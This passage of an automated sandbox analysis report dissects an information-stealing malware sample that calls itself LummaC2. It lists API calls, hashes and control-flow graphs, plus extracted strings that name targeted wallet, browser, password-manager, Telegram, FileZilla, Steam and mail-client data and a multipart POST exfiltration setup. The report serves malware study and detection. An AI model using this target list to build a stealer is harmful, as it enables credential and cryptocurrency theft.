Storage\leveldb$aea576xedchknmefphepccio576xednboohckonoeemg$afbc576xedbjpbpfadlkmhm576xedclhkeeodmamcflc$aiifb576xednbfobpmeekiphe576xedeijimdpnlpgpp$amkmj576xedjmmflddogmhpjloim576xedipbofnfjih$bcopg576xedchhojmggmff576xedilplmbdicgaihlkp$bfn576xedaelmomeim576xedhlpmgjnjophhpkkoljpa$bhgho576xedamapcdpbohphigoo576xedoaddinpkbai$bln576xedieiiffboi576xedllknjnepogjhkgnoapac$cihm576xedoadaighcej576xedopammfbmddcmdekcje$cj576xedelfplplebdjjenllpjcbl576xedmjkfcffne$cnma576xedmaachppnkjgnil576xeddpdmkaakejnhae$cphhlg576xedmgameodnhkjdmkpa576xednlelnlohao$dkded576xedlpgdmmkkfjabffeg576xedanieamfklkm$dmkam576xedcknogkgcdfhhbddcghach576xedkejeap$ejbalbako576xedplchlghecda576xedlmeeeajnimhm$ffn576xedbelfdoeiohenk576xedjibnmadjiehjhajb$fhbohimaelboh576xedpjbbldcngcnapn576xeddodjp$fhmfend576xedgdocmcbmfikdcog576xedofphimnkno$fihka576xedkfobkmkjojpchpf576xedgcmhfjnmnfpi$flpici576xedilemghbmfalica576xedjoolhkkenfel$fnjhmkhhmkb576xedjkkabndcn576xednogagogbneec$gae576xeddmjdfmmahhbj576xedefcbgaolhhanlaolb$hcflp576xedincpppdclinealmandi576xedjcmnkbgn$hnfanknocfe576xedofbddgcijnm576xedhnfnkdnaad$hpg576xedlfhgfnhbgpjden576xedjgmdgoeiappafln$iW576xedlt$ibnejdfjmmk576xedpcnlpebklmnk576xedoeoihofec$ijmp576xedgkjfkbfho576xedebgogflfebnmejmfbml$ilgcn576xedhelpchnceeipipij576xedaljkblbcobl$imloif576xedkgjagghnncjkhgg576xeddhalmcnfklk$infe576xedboajgfhgbjpjbeppbkg576xednabfdkdaf$jbd576xedaocneiiinmjbj576xedlgalhcelgbejmnid$jojhf576xedeoedkpkglbfimdfabp576xeddfjaoolaf$kkpllko576xeddjeloidieedojogacfhp576xedaihoh$kln576xedaejjgbibmhlephnh576xedpmaofohgkpgkd$kn576xedcchdigobgh576xedenbbaddojjnnaogfppfj$kpfop576xedkelmapcoipemfend576xedmdcghnegimn$lkcjl576xednjfpbikmcm576xedbachjpdbijejflpcm$lodccj576xedjbdhfakaekdiahmedf576xedbieldgik$mnfif576xedefkajgofkcjkemidiae576xedcocnkjeh$nanj576xedmdknhkinifnkgdcggcfnhd576xedaammmj$nhnk576xedbkgjikgcigadomkph576xedalanndcapjk$nkbihfbeo576xedgaeaoehlef576xednkodbefgpgknn$nkd576xeddgncdjgjfcddamfg576xedcmfnlhccnimig$nknhi576xedehlklippafakaeklbegl576xedecifhad$nlbm576xednnijcnlegkjjpcfjclm576xedcfggfefdm$nlgbh576xeddfgdhgbiamfdfmb576xedikcdghidoadd$oel576xedjdldpnmdbchonieli576xeddgobddffflal$onof576xedpnbbkehpmmoa576xedbgpcpmigafmmnjhl$ookjlb576xedkiijinhpmnjffcofj576xedonbfbgaoc$ppbibelpc576xedjmhbdihakflkd576xedcoccbgbkpo
                                                                    • API String ID: 4038537762-1377293222
                                                                    • Opcode ID: d76d7c670001a5dbd7c9de7b01bcafc77f6a8fb9cd7de87a96b03e98a683fc98
                                                                    • Instruction ID: d3b4c8d05487b98e51841e16d8283d2e4e5c243acd67d22c1ca68150be5d60ea
                                                                    • Opcode Fuzzy Hash: d76d7c670001a5dbd7c9de7b01bcafc77f6a8fb9cd7de87a96b03e98a683fc98
                                                                    • Instruction Fuzzy Hash: 05E229F2E001065AEF2896588D8357F7969EB14304F25453FF80AF63D1EA3C8E558A9F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $jRk$%appd576xedata%\El576xedectrum\wal576xedlets$%appd576xedata%\Ethe576xedreum$%appd576xedata%\Op576xedera Softw576xedare\Op576xedera GX Sta576xedble$%appd576xedata%\Ope576xedra Soft576xedware\Op576xedera Sta576xedble$%appda576xedta%\Bina576xednce$%appda576xedta%\Mo576xedzilla\Fir576xedefox\Prof576xediles$%appda576xedta%\Op576xedera Softwa576xedre\Op576xedera Neo576xedn\Us576xeder Da576xedta$%appdata%\AnyDesk$%appdata%\Authy Desktop\Local Storage\leveldb$%appdata%\Bitcoin\wallets$%appdata%\Electrum\wallets$%appdata%\Exodus\exodus.wallet$%appdata%\FileZilla$%appdata%\Ledger Live$%appdata%\Telegram Desktop$%appdata%\atomic\Local Storage\leveldb$%appdata%\com.liberty.jaxx\IndexedDB$%lo576xedcalapp576xeddata%\Go576xedogle\Chr576xedome\Us576xeder Dat576xeda$%loc576xedalappda576xedta%\Kom576xedeta\Us576xeder Da576xedta$%locala576xedppdata%\Mic576xedrosoft\Edge\Us576xeder Data$%localappdata%\BraveSoftware\Brave-Browser\User Data$%localappdata%\Chro576xedmium\Use576xedr Data$%localappdata%\CocCoc\Browser\User Data$%localappdata%\Coinomi\Coinomi\wallets$%localappdata%\Comodo\Dragon\User Data$%programfiles%\Steam$%programfiles%\Steam\config$%userpro576xedfile%$%userprofile%$*.576xedtxt$*.conf$*.kbdx$*.leveldb$*576xed$.fin576xedger-pr576xedint.fp$?$@an($Aan($Aan($Applications/AnyDesk$Applications/FileZilla$Applications/KeePass$Applications/Steam$Applications/Steam/config$Applications/Telegram$Brave Software$Chr576xedome$Chromi576xedum$CocCoc$Comodo$Ed576xedge$Import576xedant File576xeds/Pro576xedfile$Kom576xedeta$Mozi576xedlla Firef576xedox$Op576xedera G576xedX Stab576xedle$Op576xedera Neo576xedn$Op576xedera Sta576xedble$ST4$TT4$TT4$Wal576xedlets/Bi576xednance$Wal576xedlets/Bin576xedance$Wall576xedets/Binan576xedce$Wall576xedets/Ele576xedctrum$Wall576xedets/Eth576xedereum$Wallets/Atomic$Wallets/Authy Desktop$Wallets/Bitcoin core$Wallets/Coinomi$Wallets/Electrum$Wallets/Exodus$Wallets/JAXX New Version$Wallets/Ledger Live$ap576xedp-sto576xedre.js576xedon$keyst576xedore$q7 C$recentservers.xml$sim576xedple-sto576xedrage.j576xedson$sitemanager.xml$ssfn*$y_B>
                                                                    • API String ID: 0-3008219856
                                                                    • Opcode ID: 89aa1017212fee1e620a7fbe6eb5b8cc1132262bae267c9db256cfec3297b749
                                                                    • Instruction ID: b823253c8ecb5ad27e2b287cb1dce7157abede6b904688f5b513f038bfe6f5bb
                                                                    • Opcode Fuzzy Hash: 89aa1017212fee1e620a7fbe6eb5b8cc1132262bae267c9db256cfec3297b749
                                                                    • Instruction Fuzzy Hash: 71C207B1F002299BCF249B9AED4297E7970AB14300FE4453BE015FB391E67D89518B9F
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _strlen$CallbackDevicesDispatcherDisplayEnumUser
                                                                    • String ID: Ver$$jRk$%s (%d.%d.%d)$- CP576xedU Name: $- HW576xedID: $- Phys576xedical Ins576xedtalled Memor576xedy: $- Screen Resoluton: $4jn`$4jn`$Aan($C: $GhYuIq$LID(Lu576xedmma ID): $Lum576xedmaC2, Build 20233101$Syste576xedm.txt$TT4$advapi32.dll$kernel32.dll$n._$n: $o._$o._$p7 C$q7 C$sion$user32.dll$x_B>$y_B>$y_B>
                                                                    • API String ID: 3760342818-3740799521
                                                                    • Opcode ID: 6304991c9ea5481c71fa155e6c83a9424bd06b545788eb0206d9441cc2e12171
                                                                    • Instruction ID: 1dd07344ff1857ff55ac4e32df16f8dea444b4f0229405df86b90c0a9d587245
                                                                    • Opcode Fuzzy Hash: 6304991c9ea5481c71fa155e6c83a9424bd06b545788eb0206d9441cc2e12171
                                                                    • Instruction Fuzzy Hash: 710304B1504B419BDB349F29C88162BB7E0EB59310F24E92FE09BDB751D678E841CB1B
                                                                    APIs
                                                                    • lstrcmpW.KERNEL32(?,0045FD9A), ref: 0040C3B1
                                                                    • lstrcatW.KERNEL32(?,?), ref: 0040C427
                                                                    • lstrcatW.KERNEL32(?,0045E148), ref: 0040C431
                                                                    • lstrlenW.KERNEL32(?), ref: 0040C581
                                                                    • lstrcmpW.KERNEL32(?,0045FD96), ref: 0040C8D4
                                                                    • lstrlenW.KERNEL32(00001A2F), ref: 0040C901
                                                                    • lstrlenW.KERNEL32(00001A2F), ref: 0040D826
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrlen$lstrcatlstrcmp
                                                                    • String ID: "B!H$"B!H$K2&e$Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$L2&e$L2&e$LOCK$Y[[T$\??\$bi$kernel32.dll$ntdll.dll${#9${#9$Y=`$Y=`
                                                                    • API String ID: 156957741-3266097529
                                                                    • Opcode ID: 4ea3cb5ec3a93236d7666c37762ee35f546d3df60b269b62f966a55ecf08b777
                                                                    • Instruction ID: 88d54f90e21775ceda28cbcef53f0ea71a711b7076ec2cdd820ba9bac023bc57
                                                                    • Opcode Fuzzy Hash: 4ea3cb5ec3a93236d7666c37762ee35f546d3df60b269b62f966a55ecf08b777
                                                                    • Instruction Fuzzy Hash: 3CF2D4B2D002198BDF249F9888856BEB674EF54700F24453BE516FB3E0D7788A458B9F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: "w$ "w$EeS$EeS$EeS$JI3i$KI3i$KI3i$VL6T$VL6T$_m.Q$_m.Q$eo>w$fo>w$fo>w$mNA/
                                                                    • API String ID: 0-3469262258
                                                                    • Opcode ID: 4c97abe84ae84427aa405d53373a48c981ee8d0905f9e59dac9583b8261a3c6c
                                                                    • Instruction ID: 53dd30e2529ea33158ec6446975a809713fb297dce848eb7333cd10e9ac2b658
                                                                    • Opcode Fuzzy Hash: 4c97abe84ae84427aa405d53373a48c981ee8d0905f9e59dac9583b8261a3c6c
                                                                    • Instruction Fuzzy Hash: 8303F8B1E101298BCF28DB58D9856BEB7B5AB24300F64052FD415EB360D378CD868B9F
                                                                    APIs
                                                                    • lstrcatW.KERNEL32(?,C0E8A4B4), ref: 0040E55B
                                                                    • lstrcatW.KERNEL32(?,0045E102), ref: 0040E565
                                                                    • lstrcatW.KERNEL32(?,00000000), ref: 0040E7C3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat
                                                                    • String ID: !t8$"t8$"t8$(lu$)lu$)lu$Ied|$Ied|$Pz#$Pz#$kernel32.dll$n_v$n_v$u2B$v2B$v2B
                                                                    • API String ID: 4038537762-116603239
                                                                    • Opcode ID: 12bf652b1bb6dbd17e31e8eaa5e0b1f59006f58fc57be00d5560b6d267fe1625
                                                                    • Instruction ID: 6ea63d0937669649ebb299a5b80ec071dd59a3ad312de0dc3acd440ddf73d718
                                                                    • Opcode Fuzzy Hash: 12bf652b1bb6dbd17e31e8eaa5e0b1f59006f58fc57be00d5560b6d267fe1625
                                                                    • Instruction Fuzzy Hash: C7E2ECB1D001199BDF248B99C9456BEBA71BB14304F24093BE506FF3D1D3798A92CB9B
                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 00430F45
                                                                    • GetProcessHeap.KERNEL32 ref: 004314B2
                                                                    • HeapAlloc.KERNEL32(?,00000008,00000028), ref: 004314EB
                                                                    • GetDIBits.GDI32(?,00000001,00000000,?,?,00000001,00000000), ref: 004321FA
                                                                    • ReleaseDC.USER32(00000000,?), ref: 00432204
                                                                    • GetProcessHeap.KERNEL32 ref: 004326F0
                                                                    • RtlFreeHeap.NTDLL(00000000,00000000,?), ref: 004326FF
                                                                    • GetProcessHeap.KERNEL32 ref: 00432701
                                                                    • HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00432708
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Heap$Process$Free$AllocAllocateBitsRelease
                                                                    • String ID: $jRk$?$TT4$TT4$q7 C$q7 C$y_B>$y_B>
                                                                    • API String ID: 2023195035-2600574631
                                                                    • Opcode ID: 5178d04942d301932e8b90fcb8df29a441936fb4bdecd8d5e545f1f0f99eb8d3
                                                                    • Instruction ID: 86873c67e1170f8f17d23c3501641da2f07f81d3ce14e24acfbd45c3e0a97cea
                                                                    • Opcode Fuzzy Hash: 5178d04942d301932e8b90fcb8df29a441936fb4bdecd8d5e545f1f0f99eb8d3
                                                                    • Instruction Fuzzy Hash: 1FC2D771E001198BDF28CF98C9926BEB6B0AF5C314F24252BD515EB360D7789E41CB9B
                                                                    APIs
                                                                    • wsprintfW.USER32 ref: 004346DB
                                                                    • RegEnumKeyExW.KERNELBASE(?,?,?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 00434725
                                                                    • RegCloseKey.KERNELBASE(?), ref: 0043475B
                                                                    • RegOpenKeyExW.KERNELBASE(80000002,?,00000000,00020019,?,00000001), ref: 00434DA5
                                                                    • RegCloseKey.ADVAPI32(?,00000001), ref: 00434F17
                                                                    • RegCloseKey.ADVAPI32(?,00000001), ref: 00434F76
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Close$EnumOpenwsprintf
                                                                    • String ID: $jRk$$jRk$%s%s$%s\%s$?$DisplayName$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$Software.txt$TT4$TT4$y_B>$y_B>
                                                                    • API String ID: 44529101-205855365
                                                                    • Opcode ID: dfa5f994e76983f3f8c4cf4d5fb617366fdece3346ca8abc111b64aa0c8d78cd
                                                                    • Instruction ID: 3b7421bd9f904e401ff100dd7efef49cd6fe7be7401ce4d7a99a7b86551d2639
                                                                    • Opcode Fuzzy Hash: dfa5f994e76983f3f8c4cf4d5fb617366fdece3346ca8abc111b64aa0c8d78cd
                                                                    • Instruction Fuzzy Hash: E2621D70E002198BDF28CB9899455FEB674BF9C318F242517E625EB360D73CAD418B9B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat
                                                                    • String ID: %appdata%\The Bat!$%localappdata%\The Bat!$(lu$)lu$*.ABD$*.EML$*.FLX$*.HBI$*.MSB$*.MSG$*.TBB$*.TBK$*.TBN$*.mbox$*.txt$Mail Clients\The Bat\AppData$Mail Clients\The Bat\Local$kernel32.dll$n_v$n_v
                                                                    • API String ID: 4038537762-373908387
                                                                    • Opcode ID: 9865856486611794f12a139d77c18e5c05c58a82ffa741dd00c0f22e25a9caec
                                                                    • Instruction ID: 4f92dd08cf156959b88a3ca31d79465b6333db6cd064390b28fe5485dbf8b601
                                                                    • Opcode Fuzzy Hash: 9865856486611794f12a139d77c18e5c05c58a82ffa741dd00c0f22e25a9caec
                                                                    • Instruction Fuzzy Hash: 7042D7F1E0012A9BCF149A55AC5667F7B74EB51304FA8052BE405FA3A1E338CA5187DF

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 4850 405aaa-405ac0 4851 405ac3 4850->4851 4852 405ac9-405ad1 4851->4852 4853 405ad3-405ad8 4852->4853 4854 405b3c-405b41 4852->4854 4857 405ade-405ae3 4853->4857 4858 405b7f-405b84 4853->4858 4855 405b43-405b48 4854->4855 4856 405bbb-405bc0 4854->4856 4861 405c2e-405c33 4855->4861 4862 405b4e-405b53 4855->4862 4859 405ca3-405ca8 4856->4859 4860 405bc6-405bcb 4856->4860 4865 405ae9-405aee 4857->4865 4866 405bfd-405c02 4857->4866 4863 405c54-405c59 4858->4863 4864 405b8a-405b8f 4858->4864 4873 405e71-405e76 4859->4873 4874 405cae-405cb3 4859->4874 4871 405bd1-405bd6 4860->4871 4872 405dab-405db0 4860->4872 4879 405e15-405e1a 4861->4879 4880 405c39-405c3e 4861->4880 4875 405d22-405d27 4862->4875 4876 405b59-405b5e 4862->4876 4867 405e3d-405e42 4863->4867 4868 405c5f-405c64 4863->4868 4881 405d74-405d79 4864->4881 4882 405b95-405b9a 4864->4882 4869 405af4-405af9 4865->4869 4870 405ce5-405cea 4865->4870 4877 405dc6-405dcb 4866->4877 4878 405c08-405c0d 4866->4878 4903 405e48-405e4d 4867->4903 4904 4060fe-406109 4867->4904 4899 405c6a-405c6f 4868->4899 4900 40615f-406166 call 447047 4868->4900 4901 405ebc-405ee8 lstrcatW call 4360e1 lstrcatW * 2 4869->4901 4902 405aff-405b04 4869->4902 4911 405cf0-405cf5 4870->4911 4912 406059-406070 4870->4912 4885 405bdc-405be1 4871->4885 4886 405fcd-405fda 4871->4886 4889 4060a2-4060b3 4872->4889 4890 405db6-405dbb 4872->4890 4905 405e7c-405e81 4873->4905 4906 40617d-406197 call 4052a1 4873->4906 4907 405cb9-405cbe 4874->4907 4908 40602c-40604e 4874->4908 4883 406077-40608c 4875->4883 4884 405d2d-405d32 4875->4884 4909 405b64-405b69 4876->4909 4910 405f1c-405f5c call 404edc call 4048e2 4876->4910 4893 405dd1-405dd6 4877->4893 4894 4060c3-4060dd 4877->4894 4891 405c13-405c18 4878->4891 4892 405fdf-406009 4878->4892 4897 405e20-405e25 4879->4897 4898 4060e6 4879->4898 4895 405c44-405c49 4880->4895 4896 406018-406027 lstrcatW 4880->4896 4887 406091-40609d 4881->4887 4888 405d7f-405d84 4881->4888 4913 405fa0-405fc8 call 404988 4882->4913 4914 405ba0-405ba5 4882->4914 4883->4852 4884->4852 4936 405d38-405d64 4884->4936 4885->4852 4918 405be7-405bf8 lstrcatW 4885->4918 4886->4852 4887->4852 4888->4852 4937 405d8a-405d9b 4888->4937 4931 406157-40615a 4889->4931 4932 4060b9-4060be 4889->4932 4940 405dc1 4890->4940 4941 406115-406129 4890->4941 4891->4852 4919 405c1e-405c29 4891->4919 4923 406010-406013 4892->4923 4924 40600b 4892->4924 4893->4852 4942 405ddc-405e05 4893->4942 4929 4060df-4060e4 4894->4929 4894->4931 4921 40619c-4061d6 call 4038d5 call 403a1c 4895->4921 4922 405c4f 4895->4922 4896->4852 4897->4852 4943 405e2b-405e38 4897->4943 4934 4060e7 4898->4934 4899->4852 4925 405c75-405c93 call 403600 4899->4925 4959 40616b-406178 4900->4959 4901->4852 4944 405b0a-405b0f 4902->4944 4945 405eed-405f17 lstrcatW call 4360e1 lstrcatW * 2 4902->4945 4903->4852 4946 405e53-405e5a call 447047 4903->4946 4916 40612e-406150 4904->4916 4935 40610b-406113 4904->4935 4905->4852 4947 405e87-405eac 4905->4947 4906->4852 4907->4852 4930 405cc4-405ce0 4907->4930 4926 406152 4908->4926 4927 406054 4908->4927 4948 405f6c-405f90 call 403600 4909->4948 4949 405b6f-405b74 4909->4949 4910->4931 4984 405f62-405f67 4910->4984 4911->4852 4933 405cfb-405d13 call 403e03 4911->4933 4928 406072 4912->4928 4912->4929 4913->4852 4915 405bab-405bb0 4914->4915 4914->4916 4915->4852 4951 405bb6-40620a call 4360e1 call 40e14e 4915->4951 4916->4926 4916->4931 4918->4852 4919->4852 4987 4061d8 4921->4987 4988 4061dd-4061e0 4921->4988 4922->4852 4923->4852 4924->4923 4925->4931 4981 405c99-405c9e 4925->4981 4926->4931 4927->4931 4928->4931 4929->4931 4930->4852 4931->4852 4932->4931 4966 405d16-405d1d 4933->4966 4934->4934 4935->4900 4935->4941 4936->4923 4957 405d6a-405d6f 4936->4957 4937->4931 4958 405da1-405da6 4937->4958 4940->4852 4941->4852 4942->4923 4962 405e0b-405e10 4942->4962 4943->4852 4944->4852 4963 405b11-405b31 4944->4963 4945->4852 4978 405e5f-405e6c 4946->4978 4947->4931 4965 405eb2-405eb7 4947->4965 4948->4931 4980 405f96-405f9b 4948->4980 4949->4966 4967 405b7a 4949->4967 4957->4923 4958->4931 4959->4852 4962->4923 4963->4929 4977 405b37 4963->4977 4965->4931 4966->4852 4967->4852 4977->4931 4978->4852 4980->4931 4981->4931 4984->4931 4987->4988 4988->4851
                                                                    APIs
                                                                    • lstrcatW.KERNEL32(?,0045E102,?,?,00000000,?,?,004058C6), ref: 00405BEF
                                                                    • lstrcatW.KERNEL32(00000000,?,?,?,?,00000000,?,?,004058C6), ref: 00405EC4
                                                                    • lstrcatW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,?,004058C6), ref: 00405ED7
                                                                    • lstrcatW.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,004058C6), ref: 00405EDF
                                                                    • lstrcatW.KERNEL32(?,?,?,?,?,00000000,?,?,004058C6), ref: 00405EF3
                                                                    • lstrcatW.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,004058C6), ref: 00405F06
                                                                    • lstrcatW.KERNEL32(?,84D55917,?,?,?,?,00000000,?,?,004058C6), ref: 00405F0E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat
                                                                    • String ID: *576xed$,$/Ext576xedensio576xedns/$\Loc576xedal Extens576xedion Settin576xedgs\$n_v$n_v
                                                                    • API String ID: 4038537762-1578839816
                                                                    • Opcode ID: c0ae44d74d2992532015a5b165d06f1b6e1b0c53f96b55d44899152aba16d5ae
                                                                    • Instruction ID: e5bf92a8c3e4632e865b489cc3d7c979cf6fee557c11a145fed96966642f9e4d
                                                                    • Opcode Fuzzy Hash: c0ae44d74d2992532015a5b165d06f1b6e1b0c53f96b55d44899152aba16d5ae
                                                                    • Instruction Fuzzy Hash: 5FF1F9B1D006198BCF28DB98889657FBA74EB44300F25463BE506FA3D1D73C9A518F9B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 9a%^$9a%^$9a%^$9a%^$Content-Type: multipart/form-data; boundary=%s$L%$M%$M%$POST$SqDe87817huf871793q74$TeslaBrowser/5.5$winhttp.dll
                                                                    • API String ID: 0-485045143
                                                                    • Opcode ID: 93238ce1bce5d0f96e870d474ccd94fa1ee818516e10118a3e8a746afefe7c00
                                                                    • Instruction ID: c94fe321a93857c184b0378d7fc968df2dfc5883700fbc77eb7b7d771d47b6e9
                                                                    • Opcode Fuzzy Hash: 93238ce1bce5d0f96e870d474ccd94fa1ee818516e10118a3e8a746afefe7c00
                                                                    • Instruction Fuzzy Hash: 73521DB1E802058BDF288EE89CC56FE7AA1AB58304F24052BE515E6390D77CCDC1979F

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 5373 40620b-406227 5374 40622d-406235 5373->5374 5375 406237-40623c 5374->5375 5376 40627e-406283 5374->5376 5379 406242-406247 5375->5379 5380 4062ef-4062f4 5375->5380 5377 406289-40628e 5376->5377 5378 40633e-406343 5376->5378 5381 406294-406299 5377->5381 5382 40639b-4063a0 5377->5382 5387 406462-406467 5378->5387 5388 406349-40634e 5378->5388 5385 4063e7-4063ec 5379->5385 5386 40624d-406252 5379->5386 5383 406431-406436 5380->5383 5384 4062fa-4062ff 5380->5384 5393 4064df-4064e4 5381->5393 5394 40629f-4062a4 5381->5394 5395 406521-406526 5382->5395 5396 4063a6-4063ab 5382->5396 5391 406615-40661a 5383->5391 5392 40643c-406441 5383->5392 5399 406305-40630a 5384->5399 5400 406596-40659b 5384->5400 5403 4065e1-4065e6 5385->5403 5404 4063f2-4063f7 5385->5404 5401 406543-406548 5386->5401 5402 406258-40625d 5386->5402 5397 40664c-406651 5387->5397 5398 40646d-406472 5387->5398 5389 406354-406359 5388->5389 5390 40648f-406494 5388->5390 5405 4066f7-406715 5389->5405 5406 40635f-406364 5389->5406 5431 40649a-40649f 5390->5431 5432 4066ae-4066d0 5390->5432 5429 406620-406625 5391->5429 5430 406773-406784 lstrcatW 5391->5430 5421 406825-406840 call 419e6b 5392->5421 5422 406447-40644c 5392->5422 5407 4066e0-4066f2 call 447a80 5393->5407 5408 4064ea-4064ef 5393->5408 5423 406789-4067ad call 404822 5394->5423 5424 4062aa-4062af 5394->5424 5409 406683-40668a 5395->5409 5410 40652c-406531 5395->5410 5411 4063b1-4063b6 5396->5411 5412 4067b2-4067d4 5396->5412 5435 406845-40686e 5397->5435 5436 406657-40665c 5397->5436 5427 406478-40647d 5398->5427 5428 40668f-4066a9 5398->5428 5433 406310-406315 5399->5433 5434 4064c4-4064c7 5399->5434 5419 406750-406762 call 447a80 5400->5419 5420 4065a1-4065a6 5400->5420 5413 40671a-406740 5401->5413 5414 40654e-406553 5401->5414 5415 406263-406268 5402->5415 5416 4067e4-4067fd call 447047 5402->5416 5425 406767-40676e 5403->5425 5426 4065ec-4065f1 5403->5426 5417 406802-40680d lstrcatW call 40b7bb 5404->5417 5418 4063fd-406402 5404->5418 5405->5374 5437 40636a-40636f 5406->5437 5438 40687d-4068ac call 404a00 5406->5438 5407->5374 5408->5374 5461 4064f5-40651a 5408->5461 5409->5374 5410->5374 5462 406537-40653e 5410->5462 5443 4068c1-4068c7 5411->5443 5444 4063bc-4063c1 5411->5444 5440 40691a-40691d 5412->5440 5449 4067da-4067df 5412->5449 5413->5440 5442 406746-40674b 5413->5442 5414->5374 5463 406559-406586 call 403ac1 call 404f5e 5414->5463 5464 4068d9-4068ec call 403c98 5415->5464 5465 40626e-406273 5415->5465 5416->5374 5484 406812-40681c 5417->5484 5446 406922-406943 lstrcatW * 2 5418->5446 5447 406408-40640d 5418->5447 5419->5374 5420->5374 5466 4065ac-4065d1 5420->5466 5421->5374 5451 406452-406457 5422->5451 5452 406948-406956 5422->5452 5423->5374 5467 4068b5-4068bc 5424->5467 5468 4062b5-4062ba 5424->5468 5425->5374 5426->5374 5469 4065f7-406610 call 447047 5426->5469 5454 406483-40648a 5427->5454 5455 40695b-406960 5427->5455 5428->5374 5429->5374 5470 40662b-40663c 5429->5470 5430->5374 5431->5374 5457 4064a5-4064b0 5431->5457 5439 4066d6-4066db 5432->5439 5432->5440 5471 4068f5-406913 5433->5471 5472 40631b-406320 5433->5472 5460 4064c8 5434->5460 5458 406870 5435->5458 5459 406875-406878 5435->5459 5473 406662-40667e lstrcatW * 2 5436->5473 5474 406968-40696d 5436->5474 5437->5374 5475 406375-406387 call 40b129 5437->5475 5438->5440 5512 4068ae-4068b3 5438->5512 5439->5440 5440->5374 5442->5440 5482 4068cd-4068d4 5443->5482 5444->5374 5477 4063c7-4063d7 5444->5477 5446->5374 5447->5374 5479 406413-40642c lstrcatW * 2 5447->5479 5449->5440 5451->5482 5483 40645d 5451->5483 5452->5374 5454->5374 5455->5374 5494 406966 5455->5494 5457->5466 5486 4064b6-4064be 5457->5486 5458->5459 5459->5374 5460->5460 5488 40658c-406591 5461->5488 5489 40651c 5461->5489 5462->5374 5463->5440 5463->5488 5464->5440 5513 4068ee-4068f3 5464->5513 5465->5374 5493 406275-40627c 5465->5493 5466->5440 5495 4065d7-4065dc 5466->5495 5467->5374 5468->5374 5497 4062c0-4062e4 5468->5497 5469->5374 5470->5440 5499 406642-406647 5470->5499 5471->5440 5492 406915 5471->5492 5472->5374 5500 406326-406339 5472->5500 5473->5374 5474->5374 5496 406973-406991 call 404c9c 5474->5496 5511 40638c-406396 5475->5511 5477->5440 5502 4063dd-4063e2 5477->5502 5479->5374 5482->5374 